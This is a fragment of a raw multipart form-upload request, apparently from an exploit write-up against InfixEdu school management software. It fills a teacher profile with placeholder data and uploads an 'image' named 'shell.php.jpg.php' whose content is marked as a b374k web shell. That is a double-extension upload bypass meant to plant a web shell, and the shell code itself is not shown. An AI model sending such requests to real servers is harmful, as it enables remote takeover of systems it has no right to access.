name="name"Teacher------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="email"teacher@infixedu.com------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="phone"01711223345------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="country"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="city"1374------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="zip"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="currency"112------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="language"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="facebook"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="twitter"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="linkedin"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="instagram"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="short_details"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="about"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="image"; filename="shell.php.jpg.php"Content-Type: image------b374kshell content-----------WebKitFormBoundaryzjX6L4V6hVC4KIEC--

Tag

#apple